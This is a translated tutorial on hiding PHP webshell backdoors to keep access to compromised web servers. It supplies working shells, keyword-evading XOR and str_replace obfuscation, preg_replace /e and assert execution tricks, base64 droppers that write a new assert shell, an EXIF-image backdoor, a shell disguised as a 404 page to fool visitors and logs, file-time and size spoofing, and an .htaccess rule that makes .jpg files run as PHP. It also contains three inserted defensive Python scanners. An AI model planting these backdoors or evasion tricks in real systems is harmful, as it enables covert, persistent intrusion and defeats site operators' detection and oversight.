After a successful test you usually want to keep your access for longer. Leaving a backdoor is therefore an important job; backdoors are typically placed at the level of database permissions, web permissions, system user accounts, and so on. This article lays out some ideas on hiding a web backdoor, for general knowledge.
0x00 Preface
Taking PHP web backdoors as an example, one of the most common backdoors is written like this:

```php
<?php eval($_POST['cmd']); ?>
```

Or like this, with another function in place of eval:

```php
<?php ...($_POST['cmd']); ?>
```

Only the function being called differs; to see which functions a host has disabled, search php.ini for disable_functions.
But ops staff have many intuitive ways of finding our shells, such as:
- comparing against a file backup to spot anomalies by file name, modification time or size;
- webshell scanning scripts such as scanbackdoor.php, pecker or shelldetect.php, and assorted scanners;
- looking for the backdoor in the access.log;
- or our test being blocked by a WAF and leaving a warning log, and so on.
Against these common detection methods, the following seven common techniques for hiding a shell are summarised.
0x01 Evasion
A look at the various backdoor-scanning code shows that leaving a notorious, well-known keyword in the shell is out of the question.
Common keywords include:
- system command execution: system, passthru, shell_exec, exec, popen, proc_open
- code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
- file inclusion and file writing: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
Some people used to be clever and run commands with `$_POST[0]($_POST[1])`, but by now that too has trouble escaping the scanners. Still, the variations are endless; there is no limit to how the call can be constructed.
Tudouya on FreeBuf gave [a construction technique](http://www.freebuf.com/articles/web/33824.html) that works like this:
```php
<?php
@$_++;                      // $_ = 1
$__ = ("#" ^ "|");          // $__ = _
$__ .= ("." ^ "~");         // _P
$__ .= ("/" ^ "`");         // _PO
$__ .= ("|" ^ "/");         // _POS
$__ .= ("{" ^ "/");         // _POST
${$__}[!$_](${$__}[$_]);    // $_POST[0]($_POST[1]);
?>
```
Once constructed, it is of course far too obvious written out like this:

```php
<?php $_++; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); @${$__}[!$_](${$__}[$_]); ?>
```

So pad it with some ordinary-looking code as a disguise, and a simple scanner-evading shell sample appears.
It runs without errors, passes ordinary scanners, and can also be used to drop new temporary shells.
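As an added example (not part of the original article), here is a small scanner written from the defender's side: it statically resolves XOR chains like the one above to the string they build and flags the variable-variable call, and it also checks for the two building blocks the following sections lean on, preg_replace with the /e modifier and base64 literals that decode to PHP code or .php file names. The sample source and its base64 strings are constructed for the demonstration.

```python
import base64, re
# Constructed sample (not from the article): XOR-built $_POST call, preg_replace /e and a base64 dropper.
SAMPLE = r'''<?php
@$_++;
$__=("#"^"|");$__.=("."^"~");$__.=("/"^"`");$__.=("|"^"/");$__.=("{"^"/");
${$__}[!$_](${$__}[$_]);
echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);
@fputs(fopen(base64_decode('ZHJvcC5waHA='), 'w'), base64_decode('PD9waHAgZWNobyAxOyA/Pg=='));
?>'''
SUPERGLOBALS = {"_GET", "_POST", "_REQUEST", "_COOKIE", "_SERVER", "_FILES"}
XOR_PAIR = re.compile(r'\(\s*"(.)"\s*\^\s*"(.)"\s*\)')
ASSIGN = re.compile(r'(\$\w+)\s*(\.?=)\s*((?:\(\s*"."\s*\^\s*"."\s*\)\s*\.?\s*)+);')
VARVAR_CALL = re.compile(r'\$\{\$\w+\}\s*\[[^\]]*\]\s*\(')
PREG_FIRST_ARG = re.compile(r'preg_replace\s*\(\s*(["\'])(.*?)\1', re.S)
B64_LIT = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")

def resolve_xor_strings(src):
    """Statically evaluate ("#"^"|")... chains and record what each variable ends up holding."""
    values = {}
    for var, op, expr in ASSIGN.findall(src):
        built = "".join(chr(ord(a) ^ ord(b)) for a, b in XOR_PAIR.findall(expr))
        values[var] = (values.get(var, "") if op == ".=" else "") + built
    return values

def preg_e_patterns(src):
    """First arguments of preg_replace whose modifier list contains e (replacement evaluated as code)."""
    hits = []
    for _quote, pat in PREG_FIRST_ARG.findall(src):
        end = pat.rfind(pat[0]) if pat else -1   # modifiers follow the closing delimiter
        if end > 0 and "e" in pat[end + 1:]:
            hits.append(pat)
    return hits

def decoded_base64_literals(src):
    """Decode inline base64_decode('...') arguments; droppers hide file names and payloads this way."""
    out = []
    for lit in B64_LIT.findall(src):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8"))
        except ValueError:   # not valid base64, or not text
            pass
    return out

def scan(src):
    f = [f"xor-built superglobal {v} = {s}" for v, s in resolve_xor_strings(src).items() if s in SUPERGLOBALS]
    if VARVAR_CALL.search(src):
        f.append("variable-variable indexed by request data and called as a function")
    f += [f"preg_replace with /e modifier: {p}" for p in preg_e_patterns(src)]
    f += [f"base64 literal decodes to {d!r}" for d in decoded_base64_literals(src) if "<?php" in d or d.lower().endswith(".php")]
    return f
```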
0x02 Syntax features
Another interesting way to execute commands relies on a PHP syntax feature: when PHP handles a double-quoted string it checks whether the string contains variables and substitutes their values. For example:

```php
"${@eval(phpinfo())}"
```

Inside double quotes, `${...}` is parsed as a variable expression, and the `@` suppresses errors so execution continues.
From there you can start building a hidden backdoor, but here the command to be executed is forced through a function, and yes, that function is preg_replace:

```php
<?php preg_replace("//e", $_POST['cmd'], ""); ?>
```

This trick has obviously long been on scanner blacklists, so a simple modification:
```php
<?php
function funfunc($str) {}
echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);
?>
```

It runs, and the scanner finds nothing.
The execution route is obvious once written out: the regex match wraps the captured text, `{${phpinfo()}}` for example, and passes it into funfunc, where the double-quoted string is parsed and the code runs:

```php
funfunc("{${phpinfo()}}")
```

Another method:

```php
<?php @assert("\$arr=\"" . $_GET['cmd'] . "\";"); ?>
```

0x03 Include
File inclusion is something everyone has played with, but inclusion also has its tricks.
An ordinary file include may just include a txt or jpg, or even leave behind an inclusion vulnerability, but scanners find these easily, and the extra included files are also easy to spot.
Look at this script:

```php
<?php
if (@isset($_GET['content'])) {
    $fp = fopen('README', 'w');
    file_put_contents('README', "<?php\r\n");
    @file_put_contents('README', $_GET['content'], FILE_APPEND);
    fclose($fp);
    require 'README';
}
?>
```

This solves one problem: the shell that is needed can be generated on demand.
Unfortunately, because file_put_contents and similar functions are so sensitive, it is easily found by a scan.
The approach of generating the shell from code produces it the moment the page is accessed:

```php
<?php @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'), 'w'), base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg==')); ?>
```

This evades some scanners, but the pattern is still fairly conspicuous; creating a new file only hides it well enough to get past antivirus.
(Newer approaches such as heuristics are not considered here.)
Where this does not meet the needs of the situation, the witty attacker picks up pictures again:

```php
<?php $exif = exif_read_data('./lol.jpg'); preg_replace($exif['Make'], $exif['Model'], ''); ?>
```

Reference: "A backdoor hidden in the JPG image EXIF".
This time there is no simple copy /b to build the picture trojan; instead preg_replace is borrowed to execute a specific field of the file, which works well enough.
Here you may be prompted with "Call to undefined function exif_read_data()". In that case php.ini needs editing: enable extension=php_exif.dll and move it so that it loads after extension=php_mbstring.dll.
As you can see, this picture backdoor uses the \e modifier of preg_replace, relies on PHP variable parsing for execution, uses Base64 encoding, and finally depends on the file's identifying fields to piece a complete shell together; a small reminder for anyone hiding a backdoor for the first time.
Of course, as long as there is an include point, the included file can take many forms; it can even be error_log (although that might count as off-limits), there is only the unexpected...

0x04 Stealth
To keep visitors from noticing the backdoor, clever security researchers add some confusion:

```php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[checksql]/e", $_POST['cmd'], "Saft");
?>
```
With the HTML above rendered, the page now passes itself off as a 404.
That hides it from visitors, but what about log analysis? To hide better among a large volume of log entries, construct the following script:
```php
<?php
header('HTTP/1.1 404');
ob_start();
@fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'), 'w'), base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));
ob_end_clean();
?>
```
The access looks like a genuine 404, and yes, the log entry is the same.
But by now the script we want to connect to has been generated in the current directory.
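An added example (not from the article) of the log-side check that catches this trick: a script-issued 404 still leaves the file on disk, so cross-checking 404 entries against the web root exposes it, and repeated POSTs to a "missing" resource are suspicious on their own. The log lines and the path /uploads/notfound.php are constructed.

```python
import os
import re
import tempfile
from collections import Counter

# Constructed combined-format log lines (not from the article); /uploads/notfound.php is a hypothetical path.
LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /missing.html HTTP/1.1" 404 196
10.0.0.9 - - [10/Oct/2023:13:57:12 +0000] "POST /uploads/notfound.php HTTP/1.1" 404 0
10.0.0.9 - - [10/Oct/2023:13:58:40 +0000] "POST /uploads/notfound.php HTTP/1.1" 404 0
10.0.0.9 - - [10/Oct/2023:13:59:02 +0000] "POST /uploads/notfound.php?x=1 HTTP/1.1" 404 0
""".splitlines()

LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')

def parse(line):
    m = LINE.match(line)
    return m.groupdict() if m else None

def forged_404s(lines, exists):
    """404 responses for paths that do exist under the web root: the status came from the script, not the server."""
    hits = []
    for e in filter(None, map(parse, lines)):
        if e["status"] == "404" and exists(e["path"].split("?", 1)[0]):
            hits.append((e["ip"], e["method"], e["path"]))
    return hits

def repeated_post_404s(lines, threshold=2):
    """(ip, path) pairs that keep POSTing to a 'missing' resource; a genuine 404 is rarely revisited with POST."""
    counts = Counter()
    for e in filter(None, map(parse, lines)):
        if e["method"] == "POST" and e["status"] == "404":
            counts[(e["ip"], e["path"].split("?", 1)[0])] += 1
    return {k: v for k, v in counts.items() if v >= threshold}

def demo():
    """Build a throwaway web root containing the 'missing' file and run both checks against LOG."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "uploads"))
    with open(os.path.join(root, "uploads", "notfound.php"), "w") as fh:
        fh.write("placeholder\n")   # the file merely has to exist for the check
    exists = lambda p: os.path.isfile(os.path.join(root, p.lstrip("/")))
    return forged_404s(LOG, exists), repeated_post_404s(LOG)
```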
0x05 Obfuscation
Anyone who has used the weevely tool will know that the scanner-evading shell it generates looks like this:
```php
<?php
$penh = "sigpvaw4oyxjyygixlfc2xpy2uojgesgijgmojgepltgimpkskpgikttly2hvicc8lycgiujgigsugijz4no30=";
$kthe = "JGEPPJGIMPEYRRPSGIDWCYC7ZWNOBYANPCCGIUGIJGSUJZ4NOGI2V2YWWOYGIMFZZTY0X2GIRLY2GI9KGIZSHWCMVN";
$ftdf = str_replace("w", "", "stwrw_wrwepwlwawcwe");       // "str_replace"
$wmmi = "X3jlcgigxhy2ugioyxgijyyxkojy9bxlx3pvgixzxs8nlcgicvxhmvjyksigfycmf5kccnlccrgijyk";
$zrmt = "Jgm9j2nvdwgi50jzskgiyt0gikx0ngipt0tjrgittpzihyzxnldcgkysk9psgidvbycggijgiiygjgmo";
$smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");          // "base64_decode"
$jgfi = $ftdf("l", "", "lclrlelaltel_functlilon");         // "create_function"
$rdwm = $jgfi("", $smgv($ftdf("GI", "", $zrmt . $kthe . $wmmi . $penh)));
$rdwm();
?>
```
After connecting, the terminal looks like this:
PS: forgot to change the terminal encoding :(
Its evasion method is to place randomly named variables in fixed positions and then use str_replace to restore base64_decode and friends before executing the command.
Of course, obfuscation at the code level is there to evade scanners.
Some more common ways of causing confusion:
- modify the file time;
- rename the file and move it into a folder after uploading, so nobody can spot the anomaly at a glance;
- spoof the file size (at least make the size look like a normal script);
- choose a hiding path that is accessed as little as possible;
- malformed directory names such as `%20`.
Directories with a space in the name are still relatively easy to find, though.
0x06 Parsing
Use .htaccess to add a parsing backdoor, for example:

```apache
AddType application/x-httpd-php .jpg
```

Above, weevely is used as the example.
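An added example (not from the article) of auditing .htaccess for this kind of parsing backdoor: it flags AddType/AddHandler lines that map non-PHP extensions to the PHP handler, and any SetHandler that routes files to the PHP engine, whether inside a FilesMatch block or for the whole directory. The .htaccess content is constructed.

```python
import re

# Constructed .htaccess content (not from the article) mixing benign and handler-hijacking directives.
HTACCESS = """\
# rewrite rules
RewriteEngine On
AddType image/webp .webp
AddType application/x-httpd-php .jpg
AddHandler php7-script .gif .png
<FilesMatch "\\.(txt|dat)$">
    SetHandler application/x-httpd-php
</FilesMatch>
"""

PHP_HANDLER = re.compile(r"x-httpd-php|php\d*-script", re.I)
PHP_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}
FILES_OPEN = re.compile(r'<FilesMatch\s+"?([^">]+)"?\s*>', re.I)

def php_handler_hijacks(text):
    """Return (line number, directive, extensions or pattern) for rules that hand non-PHP files to the PHP engine."""
    findings, in_match = [], None
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        opened = FILES_OPEN.match(line)
        if opened:
            in_match = opened.group(1)      # remember the pattern a following SetHandler applies to
            continue
        if line.lower().startswith("</filesmatch"):
            in_match = None
            continue
        parts = line.split()
        key = parts[0].lower()
        if key in ("addtype", "addhandler") and len(parts) > 2 and PHP_HANDLER.search(parts[1]):
            odd = [e for e in parts[2:] if e.lower() not in PHP_EXT]
            if odd:
                findings.append((no, key, odd))
        elif key == "sethandler" and PHP_HANDLER.search(line):
            findings.append((no, key, [in_match or "*"]))   # "*" = every file in the directory
    return findings
```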
0x07 Summary
Summing up the methods above, most are nothing more than the process of constructing a vulnerability; however elaborate the code that builds the vulnerability can be, the backdoor can be just as elaborate. It can be slender and graceful, or simple and crude; only the occasion differs. If you can combine these ideas well, constructing your own hidden shell is not hard. The above is only a summary of experience; if you have interesting ideas, please share them.